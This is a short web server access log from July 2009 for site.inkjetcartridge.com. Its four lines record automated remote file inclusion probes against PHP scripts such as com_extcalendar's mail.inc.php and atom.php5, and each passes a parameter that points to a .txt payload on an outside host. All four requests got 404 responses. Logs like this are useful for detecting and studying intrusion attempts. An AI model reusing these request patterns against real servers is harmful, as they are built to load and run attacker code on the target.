222.122.27.67 - - [02/Jul/2009:02:53:34 -0700] "GET /logs/scripts.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
211.255.23.47 - - [02/Jul/2009:02:53:55 -0700] "GET /logs/scripts.log//include/mail.inc.php?skin_board_path=http://www.castandcatch.com/forum/phpBB3/styles/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
211.255.23.47 - - [02/Jul/2009:02:53:58 -0700] "GET /logs/scripts.log//include/mail.inc.php?skin_board_path=http://www.castandcatch.com/forum/phpBB3/styles/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
209.62.89.210 - - [02/Jul/2009:02:54:07 -0700] "GET /logs/access_090330.log//atom.php5?page=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
